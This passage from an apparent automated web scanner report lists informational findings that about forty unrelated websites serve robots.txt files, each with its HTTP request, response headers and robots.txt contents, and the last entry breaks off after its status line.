P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 17:09:58 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:51 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.307. http://www.dishant.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dishant.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dishant.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 02 Aug 2010 01:12:28 GMT
Accept-Ranges: bytes
ETag: "0e66c6df31cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:28:11 GMT
Connection: close
Content-Length: 72

User-agent: *
Disallow:

User-agent: Mediapartners-Google
Disallow:

26.308. http://www.dispatchinteractive.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dispatchinteractive.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dispatchinteractive.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:03:27 GMT
Server: Apache
Last-Modified: Wed, 01 Nov 2006 20:50:45 GMT
ETag: "dad27-298-42135a827b340"
Accept-Ranges: bytes
Content-Length: 664
Connection: close
Content-Type: text/plain

# robots.txt for http://www.dispatch related websites/

# Planet Discover
User-agent: Search Publisher
Disallow:

# Standard Googlebot
User-agent: Googlebot
Disallow:

# Googlebot Premium Content

...[SNIP]...

26.309. http://www.doctorswithoutborders.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doctorswithoutborders.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doctorswithoutborders.org

Response

HTTP/1.1 200 OK
Content-Length: 772
Content-Type: text/plain
Content-Location: http://www.doctorswithoutborders.org/robots.txt
Last-Modified: Tue, 06 Jul 2010 17:30:24 GMT
Accept-Ranges: bytes
ETag: "0b87eea301dcb1:1272"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:35:45 GMT
Connection: close

User-agent: *
Disallow: /_internal/
Disallow: /cms/
Disallow: /includes/
Disallow: /js/
Disallow: /styles/
Disallow: /test.cfm
Disallow: /test.html
Disallow: /index2.cfm
Disallow: /index2.htm
...[SNIP]...

26.310. http://www.docx-converter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.docx-converter.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.docx-converter.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 20 Jan 2010 19:03:04 GMT
ETag: "10f69d-76-3c6daa00"
Accept-Ranges: bytes
Content-Length: 118
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.docx-converter.com/
#
# All robots will spider the domain

User-agent: *
Disallow:

26.311. http://www.dodgeram.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dodgeram.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dodgeram.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 Jul 2005 18:30:48 GMT
ETag: "485028e-a0-3fadad118a600"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

# /robots.txt file for http://dodgeram.org
# denotes comment, add disallow: / to disable all robot access

User-agent: *
Disallow: /cgi-bin/
Disallow: /temp/

26.312. http://www.donationsafe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donationsafe.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.donationsafe.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:26:31 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 21 Dec 2010 22:40:59 GMT
ETag: "5ff81d3-17-497f35498f4c0"
Accept-Ranges: bytes
Content-Length: 23

User-agent: *
Disallow:

26.313. http://www.donbest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donbest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.donbest.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 60
Content-Type: text/plain
Last-Modified: Tue, 29 Jun 2010 21:56:42 GMT
Accept-Ranges: bytes
ETag: "e1199cf5d517cb1:859"
Server: Microsoft-IIS/6.0
node: 01
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:12 GMT
Connection: close

User-agent: *
Allow: /

User-Agent: MJ12bot
Disallow:

26.314. http://www.dotcells.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotcells.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotcells.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Mar 2011 00:21:23 GMT
ETag: "f146a-49a-49d9d203ae6c0"
Accept-Ranges: bytes
Content-Length: 1178
Connection: close
Content-Type: text/plain

# Website Sitemap
Sitemap: http://www.dotcells.com/sitemap.xml

# Crawlers Setup
User-agent: *

# Directories
Disallow: /404/
Disallow: /app/
Disallow: /cgi-bin/
Disallow: /downloader/
Di
...[SNIP]...

26.315. http://www.dotzup.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dotzup.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotzup.com

Response

HTTP/1.0 200 OK
Set-Cookie: ServerID=1035; path=/
Date: Tue, 03 May 2011 10:39:35 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 16:35:51 GMT
ETag: "1f0cf6-2b3-a26567c0"
Accept-Ranges: bytes
Content-Length: 691
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /exit
Disallow: /contactmail.php
Disallow: /forsalemail.php

User-agent: Googlebot
Disallow: /g-common2.googleadd.php
Disallow: /g-common2.googleadd

User-agent: Googlebot-Imag
...[SNIP]...

26.316. http://www.doublegames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doublegames.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doublegames.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.43
Date: Tue, 03 May 2011 10:46:20 GMT
Content-Type: text/plain
Content-Length: 80
Last-Modified: Tue, 06 Jul 2010 05:47:34 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /nojs/

Sitemap: http://www.doublegames.com/sitemap.xml

26.317. http://www.doubletakemicrowear.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doubletakemicrowear.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doubletakemicrowear.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:28 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 21:36:30 GMT
ETag: "4ba135f-18-483983d169380"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.318. http://www.downy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.downy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downy.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:43 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 09:00:09 GMT
ETag: "9b7ff-86-4a20ae698f840"
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

# robots.txt for www.downy.com
User-agent: *
Disallow: /css/
Disallow: /js/
Disallow: /images/
Disallow: /media/

26.319. http://www.dressupdollgames.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dressupdollgames.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dressupdollgames.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Mon, 21 Jun 2010 11:49:48 GMT
ETag: "107e85e-a9-48988e6d32f00"
Accept-Ranges: bytes
Content-Length: 169
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /error_log
Disallow: /swf/
Disallow: /img/
Disallow: /admin/
Disallow: /install/
Disallow: /lang/

Sitemap: http://www.YOURSITE.COM/sitemap.xml

26.320. http://www.dsmtuners.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dsmtuners.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dsmtuners.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Thu, 16 Sep 2010 22:26:56 GMT
ETag: "49e8749-95b-49067f195cc00"
Accept-Ranges: bytes
Content-Length: 2395
Connection: close
Content-Type: text/plain

User-agent: *

Sitemap: http://www.dsmtuners.com.com/forums/sitemap_index.xml.gz

Disallow: *.jsp
Disallow: *.js
Disallow: *.cfm
Disallow: *.asp
Disallow: *.aspx
Disallow: *.cgi
Disallow: /forums/atta
...[SNIP]...

26.321. http://www.duplinschools.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.duplinschools.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.duplinschools.net

Response

HTTP/1.1 200 OK
Content-Length: 2536
Content-Type: text/plain
Last-Modified: Tue, 22 Dec 2009 18:47:00 GMT
Accept-Ranges: bytes
ETag: "61da43253783ca1:31783"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:49:13 GMT
Connection: close

User-agent: *
Disallow: /duplinschools/adm/
Disallow: /duplinschools/Admin/
Disallow: /duplinschools/Admin_DSF/
Disallow: /duplinschools/BulkMail_Admin/
Disallow: /duplinschools/Chat/
Disallow:
...[SNIP]...

26.322. http://www.durangoherald.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.durangoherald.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.durangoherald.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Apr 2011 16:35:00 GMT
Accept-Ranges: bytes
ETag: "abf262bbf8f9cb1:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:23:57 GMT
Content-Length: 67
X-Cache: MISS from sxsquid04
X-Cache-Lookup: MISS from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

# robots.txt for DUstage and DUdev
#
User-agent: *
Disallow: /

26.323. http://www.easyjob.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.easyjob.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easyjob.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 06 Oct 2010 17:56:38 GMT
ETag: "2759a78-4fb-491f67fbe4180"
Accept-Ranges: bytes
Content-Length: 1275
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /TrialPay/*
Disallow: /Templates/*

Disallow: /affiliates/*

Disallow: /afiliados/*

Disallow: /cgi-bin/*

Disallow: /DRAFT/*

Disallow: /tell_a_friend_script_2.8*

Disallow:
...[SNIP]...

26.324. http://www.easypizzacrusts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.easypizzacrusts.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easypizzacrusts.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 27 Nov 2006 18:54:57 GMT
ETag: "da00af-1a-4233f11e56240"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.325. http://www.eatdrinkbetter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eatdrinkbetter.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eatdrinkbetter.com

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 11:17:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7ppa5~lucid1
X-Pingback: http://eatdrinkbetter.com/xmlrpc.php
CF-Cache-Status: EXPIRED
Set-Cookie: __cfduid=db88d34925af720aa39837ce8f7badd511304421438; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.eatdrinkbetter.com
Set-Cookie: __cfduid=db88d34925af720aa39837ce8f7badd511304421438; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.eatdrinkbetter.com

# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://eatdrinkbetter.com/sitemap.xml
Sitemap: http://eatdrinkbetter.com/sitemap-news.xml

User-agent: *

...[SNIP]...

26.326. http://www.ebar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebar.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebar.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3
Last-Modified: Mon, 21 Feb 2011 12:15:24 GMT
ETag: "3788014-d0-49cc9d17f8f00"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin
Disallow: /news/article.php?sec=news&article=4357
Disallow: /common/inc/article_print.php
Disallow: /classifieds/classifieds.php
Disallow: /classifieds/login.php
Disallo
...[SNIP]...

26.327. http://www.ebay.pl/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebay.pl
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebay.pl

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 659
Date: Tue, 03 May 2011 10:51:34 GMT
Connection: Keep-Alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.328. http://www.ebooknetworking.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebooknetworking.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebooknetworking.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 16 May 2010 06:19:23 GMT
ETag: "e3c9cc-19-16e030c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

26.329. http://www.eclipse.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eclipse.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eclipse.co.uk

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Tue, 03 May 2011 11:11:48 GMT
Connection: close
Content-Length: 114
Accept-Ranges: bytes
Content-Type: text/plain
Last-Modified: Mon, 11 Mar 1996 18:33:54 GMT

User-agent: * # directed to all spiders, not just Scooter
Disallow: /cgi-bin
Disallow: /eclipse/support

26.330. http://www.economywatch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.economywatch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.economywatch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:31:06 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 01:43:35 GMT
Accept-Ranges: bytes
Content-Length: 1655
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:31:06 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.331. http://www.econsumeraffairs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.econsumeraffairs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.econsumeraffairs.com

Response

HTTP/1.1 200 OK
Content-Length: 30
Content-Type: text/plain
Last-Modified: Thu, 02 Mar 2006 13:36:49 GMT
Accept-Ranges: bytes
ETag: "d3149b5bfe3dc61:d05"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:17:18 GMT
Connection: close

User-agent: *
Disallow: /

26.332. http://www.edgarsnyder.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.edgarsnyder.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edgarsnyder.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:19 GMT
Server: Apache/1.3.35 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2635 mod_perl/1.29 mod_ssl/2.8.26 OpenSSL/0.9.7c
Vary: *
Last-Modified: Tue, 08 Mar 2011 14:01:53 GMT
ETag: "153740-11a-4d7636d1"
Accept-Ranges: bytes
Content-Length: 282
Connection: close
Content-Type: text/plain

Sitemap: http://www.edgarsnyder.com/esa-sitemap.xml
Sitemap: http://www.edgarsnyder.com/esa-news-sitemap.xml
Sitemap: http://www.edgarsnyder.com/esa-rss-sitemap.xml

User-agent: *
Disallow: /esa/
Disa
...[SNIP]...

26.333. http://www.eeeuser.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eeeuser.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eeeuser.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:28:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k3h79vo0adgk7ueqt6e6jbumr0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.eeeuser.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.334. http://www.einsurancemarket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.einsurancemarket.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.einsurancemarket.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IIOZYLS172.16.16.129CKMYQ; path=/
Content-Type: text/plain
Last-Modified: Tue, 30 Mar 2010 17:48:58 GMT
Accept-Ranges: bytes
ETag: "bc53244631d0ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:27:47 GMT
Connection: close
Content-Length: 357

User-agent: *
Disallow: /learning_center/
Disallow: /agent-center/
Disallow: /online-quotes/
Disallow: /learning-center/
Disallow: /privacy-policy
Disallow: /contact-quote-wizard
Disallow: /qwa
...[SNIP]...

26.335. http://www.ej.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ej.ru
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ej.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:17:42 GMT
Content-Type: text/plain; charset=windows-1251
Connection: close
Last-Modified: Thu, 24 Mar 2011 12:06:14 GMT
ETag: "2468dce-76-4dcbd980"
Accept-Ranges: bytes
Content-Length: 118
Set-Cookie: uid=V++6B02/5FYEhgPXvDksAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=yes.no; path=/pid/

User-agent: *

Disallow: /*_openstat
Disallow: /*from=adwords
Disallow: /search/*
Disallow: /editor/

Host: www.ej.ru

26.336. http://www.electrical-online.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.electrical-online.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.electrical-online.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 01 Dec 2010 22:17:30 GMT
ETag: "120a27"
Accept-Ranges: bytes
Content-Length: 79
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

Sitemap: http://www.electrical-online.com/sitemap.xml

26.337. http://www.electronickits.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.electronickits.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.electronickits.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Sat, 13 Mar 2004 21:19:56 GMT
ETag: "13b848f-1a-3d589cf57b700"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.338. http://www.electronicsinfoline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.electronicsinfoline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.electronicsinfoline.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 07 Mar 2008 07:26:05 GMT
ETag: "24ac012-46-447d3c45ddd40"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images/
Disallow: /cgi-bin/
Disallow: /inc/

26.339. http://www.eligibilitycenter.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eligibilitycenter.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eligibilitycenter.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:42 GMT
Server: Apache
Last-Modified: Mon, 15 Feb 2010 21:12:21 GMT
ETag: "1b-47faa12a7d740"
Accept-Ranges: bytes
Content-Length: 27
Cache-Control: max-age=360, must-revalidate
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

26.340. http://www.ellusionist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ellusionist.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ellusionist.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:40:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "476-4d1b3d3e-0"
Last-Modified: Wed, 29 Dec 2010 13:53:02 GMT
Content-Type: text/plain
Content-Length: 1142
Vary: User-Agent
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 10:40:30 GMT

User-agent: Googlebot
Disallow: /index.php/
Disallow: /*?
Disallow: /*.js$
Disallow: /*.css$
Disallow: /checkout/
Disallow: /tag/
Disallow: /catalogsearch/
Disallow: /review/
Disallow: /app/
Disallow:
...[SNIP]...

26.341. http://www.emporia.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.emporia.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emporia.edu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:24:01 GMT
Server: Apache/2.2.15 (Linux/SUSE)
Last-Modified: Wed, 27 Apr 2011 18:39:03 GMT
ETag: "208e1-662-4a1eac138ffc0"
Accept-Ranges: bytes
Content-Length: 1634
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /esucms/
Disallow: /MMWIP/
Disallow: /nthf/
Disallow: /psyspe/
Disallow: /bannerusersgroup/
Disallow: /mlcadaptive/
Disallow: /webincludes/
Disallow: /global/
Disallow
...[SNIP]...

26.342. http://www.endlesspools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.endlesspools.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.endlesspools.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 25 Oct 2010 19:18:34 GMT
ETag: "1738030-166-dbbe9680"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /email/
Disallow: /pro/
Disallow: /contractor/
Disallow: /weborderform/
Disallow: /sale
Disallow: /save
Disallow: /summer
Disallow: /indexr.html
Disallow: /indexs.html
...[SNIP]...

26.343. http://www.endoftheamericandream.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.endoftheamericandream.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.endoftheamericandream.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Tue, 26 Apr 2011 10:37:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://endoftheamericandream.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 03 May 2011 10:37:28 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.344. http://www.enewspf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.enewspf.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enewspf.com

Response

HTTP/1.1 200 OK
